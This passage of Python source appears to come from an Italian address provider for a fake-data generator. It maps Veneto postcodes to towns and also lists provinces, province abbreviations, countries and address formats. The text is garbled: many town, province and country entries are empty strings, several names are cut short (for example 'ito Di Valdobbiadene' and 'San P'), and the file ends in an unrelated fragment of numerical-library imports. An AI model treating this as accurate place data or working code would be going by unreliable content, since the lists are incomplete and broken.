"TV"], ], "31023": [["Castelminio", "TV"], ["", "TV"], ["Resana", "TV"]], "31024": [["Ormelle", "TV"], ["Roncadelle", "TV"]], "31025": [["", "TV"]], "31026": [["Sarmede", "TV"], ["Montaner", "TV"]], "31027": [["Spresiano", "TV"], ["Lovadina", "TV"], ["Visnadello", "TV"]], "31028": [["Vazzola", "TV"], ["Tezze", "TV"], ["Visna'", "TV"]], "31029": [ ["Fadalto", "TV"], ["", "TV"], ["", "TV"], ["Cozzuolo", "TV"], ["Nove", "TV"], ["Carpesica", "TV"], ["", "TV"], ], "31030": [ ["", "TV"], ["Pero", "TV"], ["", "TV"], ["Dosson", "TV"], ["Carbonera", "TV"], ["", "TV"], ["Saletto", "TV"], ["Valla'", "TV"], ["Casier", "TV"], ["", "TV"], ["Sant'Eulalia", "TV"], ["Mignagola", "TV"], ["Arcade", "TV"], ["Vacil", "TV"], ["Tovena", "TV"], ["Semonzo", "TV"], ["Castelcucco", "TV"], ["Altivole", "TV"], ["", "TV"], ["", "TV"], ["", "TV"], ], "31031": [["", "TV"]], "31032": [["Lughignano", "TV"], ["", "TV"], ["Conscio", "TV"]], "31033": [ ["Salvatronda", "TV"], ["Salvarosa", "TV"], ["", "TV"], ["Sant'Andrea", "TV"], ["Villarazzo", "TV"], ], "31034": [["", "TV"]], "31035": [["", "TV"], ["Ciano", "TV"], ["", "TV"]], "31036": [["Istrana", "TV"], ["Ospedaletto", "TV"], ["Pezzan", "TV"], ["Sala", "TV"]], "31037": [["", "TV"], ["Loria", "TV"], ["Castione", "TV"], ["Bessica", "TV"]], "31038": [ ["Paese", "TV"], ["Padernello", "TV"], ["Castagnole", "TV"], ["Porcellengo", "TV"], ["Postioma", "TV"], ], "31039": [["", "TV"], ["Poggiana", "TV"], ["Spineda", "TV"]], "31040": [ ["Portobuffole'", "TV"], ["Pederobba", "TV"], ["", "TV"], ["", "TV"], ["", "TV"], ["Segusino", "TV"], ["", "TV"], ["Bavaria", "TV"], ["Salgareda", "TV"], ["Venegazzu'", "TV"], ["", "TV"], ["Campo Di Pietra Di Salgareda", "TV"], ["Mansue'", "TV"], ["Covolo", "TV"], ["Cessalto", "TV"], ["Onigo", "TV"], ["Falze'", "TV"], ["", "TV"], ["", "TV"], ["Signoressa", "TV"], ["", "TV"], ["", "TV"], ["Trevignano", "TV"], ["", "TV"], ["", "TV"], ["Cusignana", "TV"], ["Chiarano", "TV"], ["Musano", "TV"], ], "31041": [["Cornuda", "TV"]], "31042": [["", "TV"], ["Fagare'", "TV"]], "31043": [["Lutrano", "TV"], ["Fontanelle", "TV"]], "31044": [["Biadene", "TV"], ["Montebelluna", "TV"]], "31045": [["", "TV"]], "31046": [["Fae'", "TV"], ["Oderzo", "TV"], ["Rustigne'", "TV"], ["Piavon", "TV"]], "31047": [["Negrisia", "TV"], ["", "TV"], ["Levada", "TV"]], "31048": [ ["Cavrie", "TV"], ["Spercenigo", "TV"], ["Olmi", "TV"], ["", "TV"], ["", "TV"], ], "31049": [ ["ito Di Valdobbiadene", "TV"], ["Bigolino", "TV"], ["San P", "TV"], ["Valdobbiadene", "TV"], ["Guia", "TV"], ["Pianezze", "TV"], ["", "TV"], ], "31050": [ ["Santandra'", "TV"], ["Morgano", "TV"], ["Combai", "TV"], ["", "TV"], ["Fossalunga", "TV"], ["Carpenedo", "TV"], ["Miane", "TV"], ["", "TV"], ["Vedelago", "TV"], ["Fanzolo", "TV"], ["Albaredo", "TV"], ["Vascon", "TV"], ["Barcon", "TV"], ["Camalo'", "TV"], ["Badoere", "TV"], ["Povegliano", "TV"], ["Casacorba", "TV"], ["Premaor", "TV"], ["", "TV"], ["Cavasagra", "TV"], ["", "TV"], ], "31051": [["Valmareno", "TV"], ["Follina", "TV"], ["Pedeguarda", "TV"]], "31052": [["Varago", "TV"], ["", "TV"], ["Candelu'", "TV"]], "31053": [["", "TV"], ["Barbisano", "TV"], ["Solighetto", "TV"]], "31054": [["Possagno", "TV"]], "31055": [["", "TV"], ["Santa Cristina", "TV"]], "31056": [["Musestre", "TV"], ["San Cipriano", "TV"], ["Roncade", "TV"], ["Biancade", "TV"]], "31057": [["Cendon", "TV"], ["Silea", "TV"], ["Sant'Elena", "TV"]], "31058": [["Susegana", "TV"]], "31059": [["Scandolara", "TV"], ["Zero Branco", "TV"], ["Sant'Alberto", "TV"]], "31100": [ ["Treviso", "TV"], ["Fiera", "TV"], ["", "TV"], ["Monigo", "TV"], ["", "TV"], ["Canizzano", "TV"], ], "30010": [ ["Lughetto", "VE"], ["", "VE"], ["Cona", "VE"], ["", "VE"], ["Lova", "VE"], ["Pegolotte", "VE"], ["Cantarana", "VE"], ["Camponogara", "VE"], ["Liettoli", "VE"], ["Bojon", "VE"], ], "30013": [ ["", "VE"], ["", "VE"], ["Cavallino", "VE"], ["Treporti", "VE"], ["", "VE"], ["", "VE"], ], "30014": [ ["Rottanova", "VE"], ["", "VE"], ["Cavarzere", "VE"], ["", "VE"], ["Boscochiaro", "VE"], ["", "VE"], ["", "VE"], ], "30015": [ ["Valli", "VE"], ["Sant'Anna", "VE"], ["", "VE"], ["Sottomarina", "VE"], ["Chioggia", "VE"], ["", "VE"], ["", "VE"], ], "30016": [["Iesolo", "VE"], ["", "VE"]], "30020": [ ["", "VE"], ["", "VE"], ["Giai", "VE"], ["", "VE"], ["Stretti", "VE"], ["Pramaggiore", "VE"], ["", "VE"], ["Portegrandi", "VE"], ["Belfiore", "VE"], ["Marcon", "VE"], ["", "VE"], ["Meolo", "VE"], ["", "VE"], ["Loncon", "VE"], ["", "VE"], ["", "VE"], ["", "VE"], ["", "VE"], ["Gruaro", "VE"], ["Gaggio", "VE"], ["", "VE"], ["", "VE"], ["Bagnara", "VE"], ["Eraclea", "VE"], ["", "VE"], ], "30021": [ ["", "VE"], ["", "VE"], ["", "VE"], ["Caorle", "VE"], ["a", "VE"], ], "30022": [["Ceggia", "VE"]], "30023": [["", "VE"], ["Sindacale", "VE"]], "30024": [["Croce", "VE"], ["", "VE"]], "30025": [ ["Cintello", "VE"], ["", "VE"], ["", "VE"], ["Fratta", "VE"], ["", "VE"], ], "30026": [["Lugugnana", "VE"], ["Summaga", "VE"], ["Pradipozzo", "VE"], ["Portogruaro", "VE"]], "30027": [["Passarella", "VE"], ["Calvecchia", "VE"], ["", "VE"]], "30028": [ ["Bibione", "VE"], ["Cesarolo", "VE"], ["", "VE"], ["", "VE"], ["Pozzi San ", "VE"], [" Al Tagliamento", "VE"], ["Pozzi", "VE"], ], "30029": [["", "VE"], ["Corbolone", "VE"], ["", "VE"]], "30030": [ ["Fosso'", "VE"], ["Martellago", "VE"], ["Sandon", "VE"], ["Maerne", "VE"], ["", "VE"], ["Galta", "VE"], ["Salzano", "VE"], ["Olmo", "VE"], ["Tombelle", "VE"], ["Pianiga", "VE"], ["", "VE"], ["Robegano", "VE"], ["Vigonovo", "VE"], ["Cazzago", "VE"], ], "30031": [["Arino", "VE"], ["Sambruson", "VE"], ["Dolo", "VE"]], "30032": [["", "VE"]], "30033": [["Moniego", "VE"], ["Cappelletta", "VE"], ["", "VE"], ["Noale", "VE"]], "30034": [ ["Gambarare", "VE"], ["Marano", "VE"], ["", "VE"], ["", "VE"], ["Oriago", "VE"], ["Borbiago", "VE"], ["", "VE"], ["Mira", "VE"], ], "30035": [["Ballo'", "VE"], ["Zianigo", "VE"], ["Mirano", "VE"], ["Vetrego", "VE"], ["Scaltenigo", "VE"]], "30036": [ ["Caltana", "VE"], ["", "VE"], ["Veternigo", "VE"], ["Stigliano", "VE"], ["Sant'Angelo", "VE"], ], "30037": [["Peseggia", "VE"], ["Scorze'", "VE"], ["", "VE"]], "30038": [["Fornase", "VE"], ["Orgnano", "VE"], ["Spinea", "VE"]], "30039": [[" Di Stra'", "VE"], ["Stra", "VE"], ["Paluello", "VE"]], "30100": [["Venezia", "VE"]], "30121": [["Venezia", "VE"], ["Cannaregio", "VE"]], "30122": [["Sant'Elena", "VE"], ["Venezia", "VE"], ["Castello", "VE"]], "30123": [["Venezia", "VE"], ["Dorsoduro", "VE"]], "30124": [["Venezia", "VE"], ["", "VE"]], "30125": [["", "VE"], ["Venezia", "VE"]], "30126": [ ["Venezia", "VE"], ["Malamocco", "VE"], ["Lido", "VE"], ["Alberoni", "VE"], ["Portosecco", "VE"], ["San Pietro In Volta", "VE"], ["Vianelli", "VE"], ["Zennari", "VE"], ["Scarpa", "VE"], ["", "VE"], ["Busetti", "VE"], ], "30131": [["Venezia", "VE"]], "30132": [["Venezia", "VE"], ["Sant'Elena", "VE"]], "30133": [["", "VE"], ["Venezia", "VE"], ["Giudecca", "VE"]], "30135": [["", "VE"], ["Venezia", "VE"]], "30141": [["Venezia", "VE"], ["Murano", "VE"]], "30142": [ ["Mazzorbo", "VE"], ["", "VE"], ["Burano", "VE"], ["", "VE"], ["", "VE"], ["Terranova", "VE"], ["", "VE"], ], "30170": [["", "VE"]], "30171": [["Mestre", "VE"]], "30172": [["Mestre", "VE"]], "30173": [["Campalto", "VE"], ["Mestre", "VE"], ["Venezia", "VE"], ["", "VE"]], "30174": [["Zelarino", "VE"], ["Gazzera", "VE"], ["Mestre", "VE"]], "30175": [["Mestre", "VE"], ["", "VE"], ["Carpenedo", "VE"], ["Marghera", "VE"]], "36010": [ ["Camporovere", "VI"], ["Chiuppano", "VI"], ["", "VI"], ["", "VI"], ["Cavazzale", "VI"], ["Laghi", "VI"], ["Cesuna", "VI"], ["Velo", "VI"], ["Roana", "VI"], ["Carre'", "VI"], ["", "VI"], ["", "VI"], ["", "VI"], ["", "VI"], ["Rotzo", "VI"], ["Seghe", "VI"], ["Foza", "VI"], ["Vigardolo", "VI"], ["Zane'", "VI"], ["Posina", "VI"], ["", "VI"], ], "36011": [["Arsiero", "VI"], ["Castana", "VI"]], "36012": [["Rigoni", "VI"], ["Rodeghieri", "VI"], ["Asiago", "VI"], ["Sasso", "VI"]], "36013": [["", "VI"]], "36014": [["Santorso", "VI"]], "36015": [ ["'", "VI"], ["Giavenale", "VI"], ["", "VI"], ["", "VI"], ["Schio", "VI"], ["Tretto", "VI"], ["Sant'Ulderico", "VI"], ], "36016": [["Thiene", "VI"], ["Rozzampia", "VI"]], "36020": [ ["Zovencedo", "VI"], ["", "VI"], ["Solagna", "VI"], ["Albettone", "VI"], ["", "VI"], ["Agugliaro", "VI"], ["", "VI"], ["Villaganzerla", "VI"], ["Primolano", "VI"], ["", "VI"], ["", "VI"], ["Castegnero", "VI"], ["Carpane'", "VI"], ], "36021": [["Villaga", "VI"], ["", "VI"], ["", "VI"]], "36022": [["", "VI"], ["", "VI"], ["", "VI"], ["Cassola", "VI"]], "36023": [["Longare", "VI"], ["Lumignano", "VI"], ["Bugano", "VI"]], "36024": [["Mossano", "VI"], ["Nanto", "VI"], ["", "VI"]], "36025": [["", "VI"]], "36026": [["Cagnano", "VI"], ["", "VI"]], "36027": [["Rosa'", "VI"]], "36028": [["", "VI"]], "36029": [ ["", "VI"], ["Valstagna", "VI"], ["", "VI"], ["", "VI"], ], "36030": [ ["", "VI"], ["Cresole", "VI"], ["Sarcedo", "VI"], ["", "VI"], ["Novoledo", "VI"], ["Zugliano", "VI"], ["", "VI"], ["Priabona", "VI"], ["Sant'Antonio", "VI"], ["", "VI"], ["Villaverla", "VI"], ["Caltrano", "VI"], ["Staro", "VI"], ["Calvene", "VI"], ["", "VI"], ["", "VI"], ["Rettorgole", "VI"], ["", "VI"], ["", "VI"], ["Motta", "VI"], ["", "VI"], ["Costabissara", "VI"], ["Leva'", "VI"], ["Preara", "VI"], ["", "VI"], ["Centrale", "VI"], ["Caldogno", "VI"], ], "36031": [["Dueville", "VI"], ["Povolaro", "VI"]], "36032": [["Gallio", "VI"]], "36033": [["", "VI"], ["Castelnovo", "VI"]], "36034": [["Malo", "VI"], ["", "VI"]], "36035": [["", "VI"]], "36036": [["Torrebelvicino", "VI"], ["Pievebelvicino", "VI"]], "36040": [ ["Orgiano", "VI"], ["Lastebasse", "VI"], ["Pedescala", "VI"], ["", "VI"], ["Valdastico", "VI"], ["Casotto", "VI"], ["Lerino", "VI"], ["Pedemonte", "VI"], ["Brendola", "VI"], ["Pederiva", "VI"], ["", "VI"], ["Marola", "VI"], ["Sossano", "VI"], ["Laverda", "VI"], ["Sarego", "VI"], ["Grancona", "VI"], ["", "VI"], ["Salcedo", "VI"], ["", "VI"], ["Vo'", "VI"], ["", "VI"], ["", "VI"], ["Meledo", "VI"], ["", "VI"], ["Barcarola", "VI"], ["", "VI"], ], "36042": [["Mirabella", "VI"], ["Maragnole", "VI"], ["Breganze", "VI"]], "36043": [["", "VI"]], "36045": [ ["Lonigo", "VI"], ["", "VI"], ["Bagnolo", "VI"], ["Almisano", "VI"], ["Alonte", "VI"], ], "36046": [["Santa Caterina", "VI"], ["Conco", "VI"], ["Lusiana", "VI"]], "36047": [["Montegalda", "VI"], ["Montegaldella", "VI"]], "36050": [ ["", "VI"], ["Monteviale", "VI"], ["Friola", "VI"], ["", "VI"], ["Pozzoleone", "VI"], ["Lanze'", "VI"], ["Bressanvido", "VI"], ["Zermeghedo", "VI"], ["Poianella", "VI"], ["Sovizzo", "VI"], ["Cartigliano", "VI"], ["Ospedaletto", "VI"], ["", "VI"], ["", "VI"], ["Lisiera", "VI"], ["Gambugliano", "VI"], ], "36051": [["Olmo", "VI"], ["Creazzo", "VI"]], "36052": [["Enego", "VI"], ["Stoner", "VI"]], "36053": [["Gambellara", "VI"]], "36054": [["", "VI"]], "36055": [["Nove", "VI"]], "36056": [["", "VI"], ["Belvedere", "VI"]], "36057": [ ["Tormeno", "VI"], ["Arcugnano", "VI"], ["", "VI"], ["Nogarazza", "VI"], ["", "VI"], ], "36060": [ ["", "VI"], ["Fellette", "VI"], ["", "VI"], ["", "VI"], ["Spin", "VI"], ["Pianezze", "VI"], ["Longa", "VI"], ["Schiavon", "VI"], ], "36061": [["Valrovina", "VI"], ["", "VI"], ["Campese", "VI"]], "36062": [["Fontanelle", "VI"]], "36063": [["", "VI"], ["Marostica", "VI"], ["Vallonara", "VI"], ["Crosara", "VI"]], "36064": [["Molvena", "VI"], ["", "VI"], ["Villaraspa", "VI"]], "36065": [["Mussolente", "VI"], ["Casoni", "VI"]], "36066": [["Sandrigo", "VI"]], "36070": [ ["", "VI"], ["Altissimo", "VI"], ["Molino", "VI"], ["Brogliano", "VI"], ["Lovara", "VI"], ["Ferrazza", "VI"], ["Trissino", "VI"], ["", "VI"], ["", "VI"], ["Crespadoro", "VI"], ["", "VI"], ["Castelgomberto", "VI"], ], "36071": [["Pugnello", "VI"], ["Arzignano", "VI"], ["Tezze", "VI"]], "36072": [["Chiampo", "VI"]], "36073": [["Cereda", "VI"], ["", "VI"]], "36075": [ ["", "VI"], ["", "VI"], ["", "VI"], ["Sant'Urbano", "VI"], ], "36076": [["Rovegliana", "VI"], ["", "VI"]], "36077": [["Valmarana", "VI"], ["", "VI"], ["", "VI"]], "36078": [ ["", "VI"], ["Novale", "VI"], ["Castelvecchio", "VI"], ["Valdagno", "VI"], ["Piana", "VI"], ["", "VI"], ], "36100": [ ["Vicenza", "VI"], ["Setteca'", "VI"], ["Anconetta", "VI"], ["Longara", "VI"], ["Polegge", "VI"], ["Campedello", "VI"], ], "37010": [ ["Brenzone", "VR"], ["", "VR"], ["Albare'", "VR"], ["", "VR"], ["Costermano", "VR"], ["Magugnano", "VR"], ["", "VR"], ["Piovezzano", "VR"], ["", "VR"], ["", "VR"], ["Sega", "VR"], ["", "VR"], ["Affi", "VR"], ["", "VR"], ["", "VR"], ["onese", "VR"], ["Pastrengo", "VR"], ], "37011": [["Cisano", "VR"], ["Calmasino", "VR"], ["Bardolino", "VR"]], "37012": [["Bussolengo", "VR"], ["San Vito Al Mantico", "VR"]], "37013": [["Pesina", "VR"], ["Spiazzi", "VR"], ["", "VR"], ["Boi", "VR"]], "37014": [["Oliosi", "VR"], ["", "VR"], ["Sandra'", "VR"], ["Cavalcaselle", "VR"]], "37015": [["Gargagnago", "VR"], ["Domegliara", "VR"], ["Monte", "VR"], ["", "VR"]], "37016": [["Garda", "VR"]], "37017": [["Lazise", "VR"], ["", "VR"], ["Cola'", "VR"], ["Pacengo", "VR"]], "37018": [["Cassone", "VR"], ["Malcesine", "VR"]], "37019": [["", "VR"], ["", "VR"]], "37020": [ ["Rivalta", "VR"], ["Valgatara", "VR"], ["", "VR"], ["", "VR"], ["Peri", "VR"], ["", "VR"], ["", "VR"], ["", "VR"], ["Cerna", "VR"], ["", "VR"], ["Prun", "VR"], ["Fosse", "VR"], ["Fane", "VR"], ["Erbezzo", "VR"], ["Dolce'", "VR"], ["Volargne", "VR"], ], "37021": [["", "VR"], ["Corbiolo", "VR"], ["Lughezzano", "VR"]], "37022": [["Fumane", "VR"], ["Cavalo", "VR"], ["Breonio", "VR"]], "37023": [ ["Stallavena", "VR"], ["Romagnano", "VR"], ["Azzago", "VR"], ["Grezzana", "VR"], ["", "VR"], ], "37024": [ ["Negrar", "VR"], ["", "VR"], ["", "VR"], ["Arbizzano", "VR"], ], "37026": [["Ospedaletto", "VR"], ["Pescantina", "VR"], ["Settimo", "VR"]], "37028": [["Rovere' Veronese", "VR"]], "37029": [ ["Pedemonte", "VR"], ["", "VR"], ["Negarine", "VR"], ["", "VR"], ["Corrubbio", "VR"], ["Bure", "VR"], ], "37030": [ ["Vestenanova", "VR"], ["Lavagno", "VR"], ["", "VR"], ["Vago", "VR"], ["", "VR"], ["", "VR"], ["", "VR"], ["", "VR"], ["", "VR"], ["Stra'", "VR"], ["", "VR"], ["Montanara", "VR"], ["Terrossa", "VR"], ["", "VR"], ["", "VR"], ["Ronca'", "VR"], ["", "VR"], ["", "VR"], ["San Pietro", "VR"], ["", "VR"], ], "37031": [["Cellore", "VR"], ["Illasi", "VR"]], "37032": [["", "VR"], ["Brognoligo", "VR"], ["Costalunga", "VR"]], "37035": [["", "VR"]], "37036": [["Ferrazze", "VR"], ["Marcellise", "VR"], ["", "VR"], ["Mambrotta", "VR"]], "37038": [["Soave", "VR"], ["Castelletto", "VR"]], "37039": [["Tregnago", "VR"], ["Cogollo", "VR"], ["Centro", "VR"]], "37040": [ ["Arcole", "VR"], ["Caselle", "VR"], ["Marega", "VR"], ["Begosso", "VR"], ["Zimella", "VR"], ["Bevilacqua", "VR"], ["Terrazzo", "VR"], ["Bonavigo", "VR"], ["'", "VR"], ["", "VR"], ["", "VR"], ["", "VR"], ["Sabbion", "VR"], ["Veronella", "VR"], ["Pressana", "VR"], ["", "VR"], ["", "VR"], ["Gazzolo", "VR"], ["Orti", "VR"], ], "37041": [["Presina", "VR"], ["", "VR"], ["Michellorie", "VR"], ["", "VR"]], "37042": [["Caldiero", "VR"], ["Caldierino", "VR"]], "37043": [["Castagnaro", "VR"], ["Mena'", "VR"], ["", "VR"]], "37044": [["", "VR"], ["", "VR"], ["Sule'", "VR"], ["Baldaria", "VR"]], "37045": [ ["", "VR"], ["Casette", "VR"], ["Gallese", "VR"], ["Legnago", "VR"], ["Vangadizza", "VR"], ["Terranegra", "VR"], ], "37046": [["Minerbe", "VR"]], "37047": [["Locara", "VR"], ["", "VR"], ["Prova", "VR"], ["Villabella", "VR"]], "37049": [["Spinimbecco", "VR"], ["", "VR"], ["", "VR"]], "37050": [ ["Belfiore", "VR"], ["Concamarise", "VR"], ["Bonavicina", "VR"], ["Vallese", "VR"], ["", "VR"], ["Roverchiaretta", "VR"], ["Piazza", "VR"], ["Roverchiara", "VR"], ["", "VR"], ["", "VR"], ["Angiari", "VR"], ["Oppeano", "VR"], ["Palu'", "VR"], ], "37051": [["Bovolone", "VR"], ["Villafontana", "VR"]], "37052": [["Casaleone", "VR"]], "37053": [["Cherubine", "VR"], ["Asparetto", "VR"], ["Cerea", "VR"]], "37054": [["Nogara", "VR"]], "37055": [["Tombazosana", "VR"], ["Albaro", "VR"], ["", "VR"]], "37056": [["Crosarol", "VR"], ["Valmorsel", "VR"], ["Salizzole", "VR"], ["Bionde", "VR"], ["Engazza'", "VR"]], "37057": [["Raldon", "VR"], ["", "VR"], ["", "VR"]], "37058": [["Sanguinetto", "VR"]], "37059": [ ["Zevio", "VR"], ["Campagnola", "VR"], ["Perzacco", "VR"], ["Volon", "VR"], ["", "VR"], ], "37060": [ ["Maccacari", "VR"], ["Pradelle", "VR"], ["", "VR"], ["Pontepossero", "VR"], ["Bovo", "VR"], ["Correzzo", "VR"], ["Azzano", "VR"], ["Roncanova", "VR"], ["Buttapietra", "VR"], ["Bagnolo", "VR"], ["Palazzolo", "VR"], ["Bonferraro", "VR"], ["Sorga'", "VR"], ["", "VR"], ["Erbe'", "VR"], ["Sona", "VR"], ["Marchesino", "VR"], ["Beccacivetta", "VR"], ["Roncoleva'", "VR"], ["Trevenzuolo", "VR"], ["", "VR"], ["Mozzecane", "VR"], ["", "VR"], ["Lugagnano", "VR"], ["", "VR"], ], "37062": [["Dossobuono", "VR"], ["Alpo", "VR"]], "37063": [["Pellegrina", "VR"], ["Tarmassia", "VR"], ["", "VR"]], "37064": [["", "VR"]], "37066": [["Custoza", "VR"], ["Sommacampagna", "VR"], ["", "VR"]], "37067": [["Salionze", "VR"], ["", "VR"]], "37068": [["Forette", "VR"], ["Vigasio", "VR"], ["Isolalta", "VR"]], "37069": [ ["Pizzoletta", "VR"], ["", "VR"], ["Caluri", "VR"], ["Quaderni", "VR"], ["Rosegaferro", "VR"], ], "37100": [["Verona", "VR"]], "37121": [["Verona", "VR"]], "37122": [["Verona", "VR"]], "37123": [["Verona", "VR"]], "37124": [["Verona", "VR"]], "37125": [["Quinzano", "VR"], ["Verona", "VR"]], "37126": [["Verona", "VR"]], "37127": [["Verona", "VR"], ["Avesa", "VR"]], "37128": [["Verona", "VR"]], "37129": [["Verona", "VR"]], "37131": [["Verona", "VR"]], "37132": [["Verona", "VR"], ["San Michele Extra", "VR"]], "37133": [["Verona", "VR"]], "37134": [["Verona", "VR"]], "37135": [["Verona", "VR"]], "37136": [["Verona", "VR"]], "37137": [["Verona", "VR"]], "37138": [["Verona", "VR"]], "37139": [["San Mass'Adige", "VR"], ["Verona", "VR"], ["Chievo", "VR"]], "37142": [["Verona", "VR"]], } city_prefixes = ("San", "Borgo", "Sesto", "Quarto", "Settimo") city_suffixes = ( "a mare", "lido", "ligure", "del friuli", "salentino", "calabro", "veneto", "nell'emilia", "umbro", "laziale", "terme", "sardo", ) building_number_formats = ("@@#",) street_suffixes = ( "Piazza", "Strada", "Via", "Borgo", "Contrada", "Rotonda", "Incrocio", "Viale", "Stretto", "Vicolo", "Canale", ) postcode_formats = cap_city_province.keys() cities = getcities(cap_city_province) states = ( "Agrigento", "Alessandria", "Ancona", "Aosta", "Arezzo", "", "Asti", "Avellino", "Bari", "Barletta-Andria-Trani", "Belluno", "Benevento", "Bergamo", "Biella", "Bologna", "Bolzano", "Brescia", "Brindisi", "Cagliari", "Caltanissetta", "Campobasso", "Carbonia-Iglesias", "Caserta", "Catania", "Catanzaro", "Chieti", "Como", "Cosenza", "Cremona", "Crotone", "Cuneo", "Enna", "Fermo", "Ferrara", "Firenze", "Foggia", "Forlì-Cesena", "Frosinone", "Genova", "Gorizia", "Grosseto", "Imperia", "Isernia", "La Spezia", "L'Aquila", "Latina", "Lecce", "Lecco", "Livorno", "Lodi", "Lucca", "Macerata", "Mantova", "Massa-Carrara", "Matera", "Messina", "Milano", "Modena", "", "Napoli", "Novara", "Nuoro", "Olbia-Tempio", "Oristano", "Padova", "Palermo", "Parma", "Pavia", "Perugia", " Urbino", "Pescara", "Piacenza", "Pisa", "Pistoia", "Pordenone", "Potenza", "Prato", "Ragusa", "Ravenna", "", "", "Rieti", "Rimini", "Roma", "Rovigo", "Salerno", "", "Sassari", "Savona", "Siena", "Siracusa", "Sondrio", "Taranto", "Teramo", "Terni", "Torino", "Ogliastra", "Trapani", "Trento", "Treviso", "Trieste", "Udine", "Varese", "Venezia", "Verbano-Cusio-Ossola", "Vercelli", "Verona", "", "Vicenza", "Viterbo", ) states_abbr = ( "AG", "AL", "AN", "AO", "AR", "AP", "AT", "AV", "BA", "BT", "BL", "BN", "BG", "BI", "BO", "BZ", "BS", "BR", "CA", "CL", "CB", "CI", "CE", "CT", "CZ", "CH", "CO", "CS", "CR", "KR", "CN", "EN", "FM", "FE", "FI", "FG", "FC", "FR", "GE", "GO", "GR", "IM", "IS", "SP", "AQ", "LT", "LE", "LC", "LI", "LO", "LU", "MC", "MN", "MS", "MT", "ME", "MI", "MO", "MB", "NA", "NO", "NU", "OT", "OR", "PD", "PA", "PR", "PV", "PG", "PU", "PE", "PC", "PI", "PT", "PN", "PZ", "PO", "RG", "RA", "RC", "RE", "RI", "RN", "RM", "RO", "SA", "VS", "SS", "SV", "SI", "SR", "SO", "TA", "TE", "TR", "TO", "OG", "TP", "TN", "TV", "TS", "UD", "VA", "VE", "VB", "VC", "VR", "VV", "VI", "VT", ) countries = ( "Afghanistan", "Albania", "Algeria", "American Samoa", "Andorra", "Angola", "Anguilla", "Antartide (territori a sud del 60° parallelo)", "Antigua e Barbuda", "Argentina", "Armenia", "Aruba", "Australia", "Austria", "Azerbaijan", "Bahamas", "Bahrain", "Bangladesh", "Barbados", "Bielorussia", "Belgio", "Belize", "Benin", "Bermuda", "Bhutan", "Bolivia", "Bosnia e Herzegovina", "Botswana", "Bouvet Island (Bouvetoya)", "Brasile", "Territorio dell'arcipelago indiano", "Isole Vergin", "", "Bulgaria", "Burkina Faso", "Burundi", "Cambogia", "Cameroon", "Canada", "", "", "Repubblica Centrale Africana", "Chad", "Cile", "Cina", "Isola di Pasqua", "Isola di Cocos (Keeling)", "Colombia", "Comoros", "Congo", "Isole Cook", "", "'Avorio", "Croazia", "Cuba", "Cipro", "Repubblica Ceca", "Danimarca", "Gibuti", "Repubblica Dominicana", "Equador", "Egitto", "El Salvador", "Guinea Equatoriale", "Eritrea", "Estonia", "Etiopia", "I", "Isole Falkland (Malvinas)", "Fiji", "Finlandia", "Francia", "Guyana Francese", "Polinesia Francese", "Territori Francesi del sud", "Gabon", "Gambia", "Georgia", "Germania", "Ghana", "Gibilterra", "Grecia", "Groenlandia", "Grenada", "Guadalupa", "Guam", "Guatemala", "Guernsey", "Guinea", "Guinea-Bissau", "Guyana", "Haiti", "Heard Island and McDonald Islands", "Città del Vaticano", "Honduras", "Hong Kong", "Ungheria", "Islanda", "India", "Indonesia", "Iran", "Iraq", "Irlanda", "Isola di Man", "Israele", "Italia", "Giamaica", "Giappone", "Jersey", "Giordania", "Kazakhstan", "Kenya", "Kiribati", "Korea", "Kuwait", "Republicca Kirgiza", "Repubblica del Laos", "Latvia", "Libano", "Lesotho", "Liberia", "Libyan Arab Jamahiriya", "Liechtenstein", "Lituania", "Lussemburgo", "Macao", "Macedonia", "Madagascar", "Malawi", "Malesia", "Maldive", "Mali", "Malta", "Isole Marshall", "Martinica", "Mauritania", "Mauritius", "Mayotte", "Messico", "Micronesia", "Moldova", "Principato di Monaco", "Mongolia", "Montenegro", "Montserrat", "Marocco", "Mozambico", "Myanmar", "Namibia", "Nauru", "Nepal", "", "Olanda", "Nuova Caledonia", "Nuova Zelanda", "Nicaragua", "Niger", "Nigeria", "Niue", "Isole Norfolk", "Northern Mariana Islands", "Norvegia", "Oman", "Pakistan", "Palau", "Palestina", "Panama", "Papua Nuova Guinea", "Paraguay", "Peru", "Filippine", "Pitcairn Islands", "Polonia", "Portogallo", "Porto Rico", "Qatar", "Reunion", "Romania", "Russia", "Rwanda", "San Bartolomeo", "Sant'Elena", "Saint Kitts and Nevis", "Saint Lucia", "", "Saint Pierre and Miquelon", "Saint Vincent and the Grenadines", "Samoa", "San Marino", "Sao Tome and Principe", "Arabia Saudita", "Senegal", "Serbia", "Seychelles", "Sierra Leone", "Singapore", "Slovenia", "Isole Solomon", "Somalia", "Sud Africa", "Georgia del sud e South Sandwich Islands", "Spagna", "Sri Lanka", "Sudan", "Suriname", "Svalbard & Jan Mayen Islands", "Swaziland", "Svezia", "Svizzera", "Siria", "Taiwan", "Tajikistan", "Tanzania", "Tailandia", "Timor-Leste", "Togo", "Tokelau", "Tonga", "Trinidad e Tobago", "Tunisia", "Turchia", "Turkmenistan", "Isole di Turks and Caicos", "Tuvalu", "Uganda", "Ucraina", "Emirati Arabi Uniti", "Regno Unito", "Stati Uniti d'America", "United States Minor Outlying Islands", "Isole Vergini Statunitensi", "Uruguay", "Uzbekistan", "Vanuatu", "Venezuela", "Vietnam", "Wallis and Futuna", "Western Sahara", "Yemen", "Zambia", "Zimbabwe", ) city_formats = ( "{{city_prefix}} {{first_name}} {{city_suffix}}", "{{city_prefix}} {{first_name}}", "{{first_name}} {{city_suffix}}", "{{last_name}} {{city_suffix}}", ) street_name_formats = ( "{{street_suffix}} {{first_name}}", "{{street_suffix}} {{last_name}}", ) street_address_formats = ( "{{street_name}}, {{building_number}}", "{{street_name}}, {{building_number}} {{secondary_address}}", ) address_formats = ("{{street_address}}\n{{postcode_city_province}}",) secondary_address_formats = ("Appartamento @#", "Piano #") def postcode_city_province(self) -> str: cap = self.postcode() rand_city_prov: List[str] = self.random_element(self.cap_city_province[cap]) return cap + ", " + rand_city_prov[0] + " (" + rand_city_prov[1] + ")" def city(self) -> str: return self.random_element(self.cities) def city_prefix(self) -> str: return self.random_element(self.city_prefixes) def secondary_address(self) -> str: return self.numerify(self.random_element(self.secondary_address_formats)) def administrative_unit(self) -> str: return self.random_element(self.states) state = administrative_unit def state_abbr(self) -> str: return self.random_element(self.states_abbr) """ Packages import """ import numpy as np import matplotlib.pyplot as plt from numba import jit import bottleneck as bn import scipy.stats as sc from math import log, sqrt eps = 1e-15 #: Threshold value: everything in [0, 1] is truncated to [eps, 1 - eps] 